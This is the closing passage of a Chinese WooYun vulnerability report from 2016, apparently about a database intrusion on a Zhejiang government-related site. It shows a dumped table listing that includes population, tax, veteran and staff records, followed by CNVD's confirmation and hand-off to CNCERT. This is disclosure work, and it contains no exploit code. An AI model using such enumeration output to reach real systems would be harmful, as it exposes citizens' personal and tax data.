| T_Rental_record |
| aaa |
| staff |
| system_log |
| t_Union_members |
| t_duty |
| t_jiu_renkou_ddj |
| t_jiu_renkou_xinxi_bak2 |
| t_jiu_renkou_xinxi_xilou |
| t_local_tax_record_import |
| t_old_soldier |
| t_tax_info_dtl |
| v_company_tax_rank |
| v_monthly_company_tax_dtl_bak |
| v_no_reg_company |
+-------------------------------------+
修复方案:
这个你们比我更专业。
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2016-01-18 18:50
厂商回复:
CNVD确认所述情况,已经转由CNCERT下发给浙江分中心,由其后续协调网站管理单位处置。
最新状态:
暂无